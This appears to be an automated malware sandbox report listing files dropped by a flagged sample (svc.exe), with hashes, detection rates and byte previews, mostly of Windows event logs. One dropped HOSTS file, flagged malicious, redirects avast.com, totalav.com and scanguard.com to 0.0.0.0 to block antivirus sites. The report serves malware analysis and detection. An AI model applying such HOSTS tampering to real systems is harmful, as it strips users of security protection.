                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Users\user\AppData\Local\Temp\svc.exe
                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):150528
                                              Entropy (8bit):5.769203996328619
                                              Encrypted:false
                                              SSDEEP:3072:60gp4UGo8MYmB99SrtM0ieiG027bAM8mMu0cM:60c4kzOieR02s
                                              MD5:658AC2968AC81EADBE165CFD2A770C34
                                              SHA1:39D228C2B5D1181ABE8BCE6A95FE852C8E06A79C
                                              SHA-256:4F698FB3C8100837ACB42BEE30B7B0C362BCF6D3C617880BEDC86E1D57C25D11
                                              SHA-512:CAF647E30FB73FE25E879A83C38D24B9E2453754DABBB3B2C7E885B814C9C06053206CBAAE777061C3873FC687DE5F15FAC5058B8B675C57235CFCCC2277A106
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 87%
                                              • Antivirus: Virustotal, Detection: 80%, Browse
                                              Joe Sandbox View:
                                              • Filename: H8Q1WRGrzw.exe, Detection: malicious, Browse
                                              • Filename: vABMEuk0Ie.exe, Detection: malicious, Browse
                                              • Filename: Readme.lnk, Detection: malicious, Browse
                                              • Filename: SecuriteInfo.com.Win64.CrypterX-gen.16599.19591.exe, Detection: malicious, Browse
                                              • Filename: file.exe, Detection: malicious, Browse
                                              • Filename: file.exe, Detection: malicious, Browse
                                              • Filename: file.exe, Detection: malicious, Browse
                                              • Filename: file.exe, Detection: malicious, Browse
                                              • Filename: rust_cheat.exe, Detection: malicious, Browse
                                              • Filename: blaaack.exe, Detection: malicious, Browse
                                              Preview:MZ......................@.......................................sr......!..L.!This program cannot be run in DOS mode....$............qgL.qgL.qgL..aM.qgL..fM.qgL.qfL.qgLO.oM.qgLO..L.qgLO.eM.qgLRich.qgL........................PE..d.....[c.........."...... ...*.......#.........@..........................................`..................................................8.......p..`....`..8....................5..8............................................0...............................text...%........ .................. ..`.rdata.......0.......$..............@..@.data........P......................@....pdata..8....`.......8..............@..@.rsrc...`....p.......:..............@..@........................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                              Category:dropped
                                              Size (bytes):10426648
                                              Entropy (8bit):7.648557200639253
                                              Encrypted:false
                                              SSDEEP:98304:Ri8PI8YhtNar6EzgWmw4386lomr6V3HrP8WXcePQB5FxxJpP8oojTvZf9tn7/gal:RdgrhPaGEwlomO8McYg7Fd0TvZ9t/0y
                                              MD5:327B8ED0CDEBAE6962718656B5A72A4C
                                              SHA1:CA1D9CF5D800C9743DD194A334C149B979FD833E
                                              SHA-256:392CF677345CC76896C49A0C996D224D7DDB5F74CFA443CD8FD26FCF936571BD
                                              SHA-512:237043CC79C2471804C5D66FE22B39DEF95E0A0FEDF4EA438B9A560BF2535DE8F3C40CB0C0818ED4DFCB353D1B7D96772CC142AEB055F5055D21F1B69DE95172
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 79%
                                              • Antivirus: Virustotal, Detection: 68%, Browse
                                              Preview:MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d...i..d...............&........>.............@..........................................`... ..............................................@..p....p..................)......0...............................(....................B..`............................text...............................`..`.data....n.......n..................@....rdata...O...p...P...Z..............@..@.pdata..............................@..@.xdata..\..........................@..@.bss.....=...............................idata..p....@.....................@....CRT....`....P.....................@....tls.........`.....................@....rsrc........p.....................@....reloc..0..........................@..B........................................................................................................................................................................
                                              Process:C:\Users\user\AppData\Local\Temp\svc.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):2748
                                              Entropy (8bit):4.269302338623222
                                              Encrypted:false
                                              SSDEEP:48:vDZhyoZWM9rU5fFcDL6iCW1RiJ9rn5w0K:vDZEurK9XiCW1RiXn54
                                              MD5:7B1D6A1E1228728A16B66C3714AA9A23
                                              SHA1:8B59677A3560777593B1FA7D67465BBD7B3BC548
                                              SHA-256:3F15965D0159A818849134B3FBB016E858AC50EFDF67BFCD762606AC51831BC5
                                              SHA-512:573B68C9865416EA2F9CF5C614FCEDBFE69C67BD572BACEC81C1756E711BD90FCFEE93E17B74FB294756ADF67AD18845A56C87F7F870940CBAEB3A579146A3B6
                                              Malicious:true
                                              Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost....0.0.0.0 avast.com..0.0.0.0 www.avast.com..0.0.0.0 totalav.com..0.0.0.0 www.totalav.com..0.0.0.0 scanguard.com..0.0.0.0 www.scanguard.com..
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):2352
                                              Entropy (8bit):3.69608397130941
                                              Encrypted:false
                                              SSDEEP:48:MWn0ugCrP+kcSLdwSCtR65EfWHjjP4OFiNa5nyr7O3:pjgnjJOLjjP4Ok4Qy3
                                              MD5:EBC77E48510B9D3ADC7B3EE1E6AFC60C
                                              SHA1:ACB72286AD63857771760B94D5636655704CB73D
                                              SHA-256:C6C185D46B816A41406FCF120E070017190C5F4897C9DA2429154BA0A9EA155E
                                              SHA-512:9327D4729DD25113D1D8668C5DB63149C09CFA12572F4769813E9A710147CD9DEF118498DC195CD3560AA8F3B5D6323C4EBFE79974227E228308E9536BCDBE40
                                              Malicious:false
                                              Preview:ElfChnk.................q.......q...............0...A........................................................................tIq................g...........................=...................................................................................p...................................t...?...........................................F...................M...5...........................@...................................................................................................................&...**..0...q........2 t.............&...........=..R..u..$.w.......A..k...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..2............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.A.P.I.2.F........)...G.u.i.d.....&.{.5.b.b.c.a.4.a.8.-.b.2.0.9.-.4.8.d.c.-.a.8.c.7.-.b.2.3.d.3.e.5.2.1.6.f.b.}.
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:MS Windows Vista Event Log, 3 chunks (no. 2 in use), next record no. 304, DIRTY
                                              Category:dropped
                                              Size (bytes):109960
                                              Entropy (8bit):3.645100106786527
                                              Encrypted:false
                                              SSDEEP:768:yVUHiapX7xadptrDT9W849dVUHiapX7xadptrDT9W849:NHi6xadptrX9WPOHi6xadptrX9WP
                                              MD5:EFAADB70840E313B8AB087D49C54C1B9
                                              SHA1:406B4ACCD621A6FDCAC18899300000EECBCBB1B1
                                              SHA-256:E16E9FD68776F844D433EE5BAD061542B47C26ECE7552032C86B33C1D4E50B26
                                              SHA-512:C2AF80DC86C07B82AEC64392E86BBBF798CBAB1D8EDACC0627DBA429EFB5B7359B2C22F0CDD97D4FF3D2D7A853DA25BC6721360807EFE13E40DB04E385A20522
                                              Malicious:false
                                              Preview:ElfFile.................0...................................................................................................Fo.xElfChnk.........1...............1...........p.......Q-.......................................................................~..................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........r...................m..............qo...................>...;..................**..............4.9...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):2.010692427789071
                                              Encrypted:false
                                              SSDEEP:384:GhLNzhNCjN0QNGNgN7NxEN5N0RN0zN0mN0RN00N0oN0xN0qNeN0NN0UN0lN09N0Q:GnqqIJMa/Mh9sUwBYAJGUarGlEwxV
                                              MD5:26C4C5213F3C6B727417EF07207AC1E0
                                              SHA1:1815CC405C8B70939C252390E2A1AEC87EFF45F2
                                              SHA-256:767656ADC7440970A3117E0DA8E066D9A3E1DA88CBC82ACABCFA37A3985D5608
                                              SHA-512:0355BBF16EB471698F47189031E8E18306D8F748E6CC5328C33301BEAAE435647532B24F5EC42A94B92390C19E60D11846B412C6747DC82DC98999E649607B65
                                              Malicious:false
                                              Preview:ElfChnk.%.......J.......%.......J............b..Pe.....:....................................................................&...................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...........].......M...............................VY..................................**......%........0................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):66960
                                              Entropy (8bit):4.166031663440386
                                              Encrypted:false
                                              SSDEEP:384:iVqVThfVaVtVbVHVyV5V+VSVBVNVEVrVBVeVPVpVCVigVgVpVeVNVkVUVAVJVgVf:3hft+rt
                                              MD5:D628CAFB5568DFD54905F59ECB6B1612
                                              SHA1:767414CA4C083F05D26AB0EB01F8E37E1F86E0A1
                                              SHA-256:7188170B031538707A4E0CCE0768514717EFEF0963F4C721ED8C9908864F7EEC
                                              SHA-512:DADD56C19DA2A3FD9C538F8BF1D612ADF7CA59FD3ACB8C6608B9C24BFBD80712C2B3F3A298FD07E167D7FB1BFEFE1AAD6574CE5C3A31C2E0761716C1F33300E8
                                              Malicious:false
                                              Preview:ElfChnk.............................................@z......................................................................BBh.................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..................t.............&...............................................................@.......X...a.!.....E..........@....t.....&O....<.'O........P........................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t...'..Y.J.R>:..=_M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t./.O.p.e.r.a.t.i.o.n.a.l...f.d.........N...M.i.c.r.o.s.o.f.t...W.i.n.d.o.w.s...S.e.a.r.c.h._.c.w.5.n.1.h.2.t.x.y.e.w.y.....O.p....**..................t...........
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):4.427500665682992
                                              Encrypted:false
                                              SSDEEP:384:XhTm5mcYmNQxmomTDDr0moOm3OPlfmMsgJm5mnmYmcmum/mqmlmtmumbsmbmvMmk:X8zD6CL49mVpgwQFQ
                                              MD5:5869B00EA6A1CFB37951FE4B72A7AC44
                                              SHA1:0904F67CA6DECCE5ABF521A7DE12951AAAB33992
                                              SHA-256:BFA77D9711B31CF9EA3A27DCC6A75D1963EE97B88BBA23A033EE5A4F02F8E8A5
                                              SHA-512:9FE1A471AF1614B483C526386B64B1485CC17C81A325E138D79481EE1CCB8C6F15F02F0110750310BDAB380C9F282DECACC78DCFA11E657DAE5CCAFD4F32A78F
                                              Malicious:false
                                              Preview:ElfChnk..!.......!.......!.......!............................................................................................rH................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................#...............&...................................**.......!......o.T..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 2, DIRTY
                                              Category:dropped
                                              Size (bytes):69448
                                              Entropy (8bit):0.6202750759990482
                                              Encrypted:false
                                              SSDEEP:96:59NVaO8sMa3Z85ZMLzrjjP3Z85ZuANVaO8sMa3Z85ZMLzrjjP3Z85Zu:5nV7pp8nMLnvPp8n/V7pp8nMLnvPp8n
                                              MD5:2E288CEF8D2DB52B9AC7EDC521617877
                                              SHA1:3B347F8C4498234E35922B7FDDEDEBAE89B9695E
                                              SHA-256:B6C7A60782D58AC87B820E96931FF6CB6E8A4A7AE1C46A945170CBDE344CF119
                                              SHA-512:F1A3DB502F78A65E90BC2DB5C5F308D7D769BE37B17D9330BCB8EA4318327C03678B63297CB14070CE0C5CE1742BB3FB128209478D3913455EF01315D803CFD9
                                              Malicious:false
                                              Preview:ElfFile.....................................................................................................................A..>ElfChnk.....................................p.......sx[.....................................................................V.9............................................=...........................................................................................................................f...............?...................................p...........M...F...................................................................................................................................&...............**..p...........n.d.............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):4.014860518194814
                                              Encrypted:false
                                              SSDEEP:1536:xbBN2A4VD7VAx8whAGU2woJQghcI5oIRA4Hw:
                                              MD5:4FB8E2CF8B3F20534836684947962DC2
                                              SHA1:B263607E627C81DA77DB65DF5AED2F3FD84B83E2
                                              SHA-256:DEAB680C467984C31D118AC595F0F57E573CEEC460CC4B43FCEB0BD66F731294
                                              SHA-512:D982DB741A044E222D567712FB4799FF6524A1D451C3D2EE3DF7EB17031AD20EF4EC7098BCFB3E2B00C929EB6569C858EFCF275B28240425E4BF8D994AED9053
                                              Malicious:false
                                              Preview:ElfChnk.........V...............V...................0q....................................................................... I............................................=...................................................................................%.......................................X...............?...............................................M...F...................................................................................................................................z...............**..............................g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):4.15655690871689
                                              Encrypted:false
                                              SSDEEP:768:SPB9TXYa1RFxRaayVadMRFyfqd9xZRta7Ea+5BVZUeaBhN1dJhlBlBJ9tFk6dd3s:eXY5nVYIyyqED5BVZUeouPZ
                                              MD5:2DE60575CB719BF51FAB8A63F696B052
                                              SHA1:BD44E6B92412898F185D5565865FEA3778573578
                                              SHA-256:7C14D6D72CD2DE834A0C4D17A68B2584B83B81C647D2C439E1071600E29A803D
                                              SHA-512:0471E7824795996992E736F33FEA7AF70EA909804DE3AC59EE76B5D0403901A5147558256C3AAE87BA8F1747D151DE63134661BEB9F6E0FF25AB0E3E89BC6B4A
                                              Malicious:false
                                              Preview:ElfChnk.........o...............o..........................................................................................._..................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................................y.......................**................9..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):16528
                                              Entropy (8bit):4.193569127842288
                                              Encrypted:false
                                              SSDEEP:384:AosKPoZoaAkoj+yTvoeFsoayEoJoaymoroayYoJoayWpVop2oayr/o18oaymoHoL:tjp+RYU
                                              MD5:AAA4E34B6C5469B210C4BF9720F1CBBE
                                              SHA1:2C7E20FF9005B623B87B503EEB9FFBBE0E88BB8B
                                              SHA-256:180ACD56191C71206E2EE9DD3AF93BADE80689CBFE00A88FE3835A0A47595AC4
                                              SHA-512:70AF55F1F1FBFAAFA5493915B17E9459B702366ED07BF9173BF4597634EE8D13A11AF700FCF09C8887231E12AEE8AF46A875DD56824E76E02C8C77E805206498
                                              Malicious:false
                                              Preview:ElfChnk.....................................8J..pL..4./.........................................................................................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................3..................................=/...........$..U)..............................**..............*G\.t..............$..............................................................>.......V...X.!..e..............*G\.t.....&O....{"'O........t........................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.o.d.e.I.n.t.e.g.r.i.t.y..k.N.<.D..97d>7.M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.o.d.e.I.n.t.e.g.r.i.t.y./.O.p.e.r.a.t.i.o.n.a.l...!>.U)......!>....[.U.....i...........|...:....A..3...b...%....=.......F.i.l.e.N.a.m.e.L.e.n.g.t.h.......A..3...b...%....=.......F.i.l.e.N
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):0.8524226245257144
                                              Encrypted:false
                                              SSDEEP:384:JhAiPA5PNPxPEPHPhPEPmPSPRP3PoPpPTP8PXPr5P:J2Nr
                                              MD5:B8E105CC52B7107E2757421373CBA144
                                              SHA1:39B61BEA2065C4FBEC143881220B37F3BA50A372
                                              SHA-256:B7EE076088005866A01738ECD3421A4DA3A389FFB9EEB663687823E6647F7B4B
                                              SHA-512:7670455904F14DA7A9EEFBAD5616D6D00EA262C979EDABB433182500B6EF918C6E534C94DF30D829016C8539DF12CAD5F53EC884C45AA71ACA35CF9B797361BC
                                              Malicious:false
                                              Preview:ElfChnk......................................#...&...l2.......................................................................................N...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................................................................#..........'.......................**..x.............|..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):0.8432997252442703
                                              Encrypted:false
                                              SSDEEP:384:4hZ21JJgL4JJFiJJ+aeJJ+WBJJ+5vJJ+/UJJ+4fJJ+CwJJ+D2JJ+a2JJ+JtJJ+l9:4WXSYieD+tvgzmMvRpBWfb
                                              MD5:39EE3557626C7F112A88A4DE12E904C1
                                              SHA1:C307FECC944D746A49EEA6451B7DA7301F03504C
                                              SHA-256:2B47146267E6F31192C54D3EDA77EC9ABE6A88B1C72BA9FE789C8073FD632A5A
                                              SHA-512:304C866E246B3F63BF126B33AED784913A078D44913FD987D896D2D960578B61BA7E24BA3CB8FC76608AB1E5702D0FE587A5FB8C38CDF8913D60F88B1435A2D9
                                              Malicious:false
                                              Preview:ElfChnk......................................"...&.....k.....................................................................n..................F...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................."..................................**..p............zu..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):2.9223892466691472
                                              Encrypted:false
                                              SSDEEP:384:whqhSx4h/y4Rhph5h6hNh5hah/hrhbhmhjh/h7hkh8hbhMh9hYwhChwh8hRqh28t:wbCyhLfIXBS5
                                              MD5:93BC7C28E3A7B0EC7634432FFB5F26AE
                                              SHA1:388548D6291DA80F672153D1C18E32BDA335AA90
                                              SHA-256:D354F4EA745283540D197B6D4C57EFC4F539F7566CFB3A06AEBD1243CD222EE1
                                              SHA-512:3235FEA5A58C72DCD680D436AA2652F5221C6AC6F5A53882C7817A8A65E63C13087CD5660839FC7CFA0F62C666014608B91ABB4235EF5F79F68EF5806252F84A
                                              Malicious:false
                                              Preview:ElfChnk.........F...............F...............P............................................................................*................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................n...................................................6...................................**..`............0H..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):2.838106263184782
                                              Encrypted:false
                                              SSDEEP:768:ccMhFBuyKskZljdoKXjtT/r18rQXn8r3e5POH:JMhFBuVge
                                              MD5:A2D41740C1BAF781019F282E37288DDF
                                              SHA1:A6FE635B3EC8A6923EDE10C23FC79DD32EF4F621
                                              SHA-256:7008D3010B17C0B09643D10D26B19FB971BB1963C414C1466BEAD617CF9F15E7
                                              SHA-512:E33A0A2F9473D2D05E9704FE16E6EE34FB51FD8E25A3D60E1F7A67665CA14421B6511D896526AFC7CAE1BF629BB7013FA10663620C5450F1BB51A465EF5A51CB
                                              Malicious:false
                                              Preview:ElfChnk.........?...............?...................<.md.....................................................................?.Q................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............m...........................5A......&...................................**..x...........,.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):4.634418630947688
                                              Encrypted:false
                                              SSDEEP:768:/VQ+uYvAzBCBao/F6Cf2SEqEhwaK41HZaUeI36ISKEeKRe:cH
                                              MD5:A00BAFFCABB00428EA0512FCECCC55E5
                                              SHA1:19F7C942DC26C3FF56D6240158734AFF67D6B93E
                                              SHA-256:92264C9E28AB541669DED47CFAF1E818EBD863FA9E8FC6B0F52175D694A9E0D9
                                              SHA-512:DF94AA8FA0610A0EFE7BAC0DB2A01645A4CD1C7FAD62E914EF914B526B651ED62600F63909D26149FD17C259348DADE05F48759B1DF092970251DB86690CC2B6
                                              Malicious:false
                                              Preview:ElfChnk.........m...............m.....................]......................................................................p.................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................................................%0......**..@...........WW. ..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):2.0646587531847893
                                              Encrypted:false
                                              SSDEEP:384:eh1kbAP1gzkw3kN5Ayqk+HkzGk+hkV3SuckzlckA66k+4DkzRxk+dkzwUk+rkzDK:eMAP1Qa5AgfQQgniwS
                                              MD5:399CAF70AC6E1E0C918905B719A0B3DD
                                              SHA1:62360CD0CA66E23C70E6DE3340698E7C0D789972
                                              SHA-256:FD081487CCB0ACEAD6F633AADBA4B977D2C9360CE8EAC36EAB4E3C84A701D849
                                              SHA-512:A3E17DA61D4F7C0C94FD0B67707AE35250656842D602906DE515B5E46ECD5078AC68AE607B99DC1A6061B0F896759FE46FF8EE350774205635D30363D46939EA
                                              Malicious:false
                                              Preview:ElfChnk......................................g...j..%s.g........................................................................................b...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........................................&...........c..;...............................**..x...........HD................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):4.4364303862010575
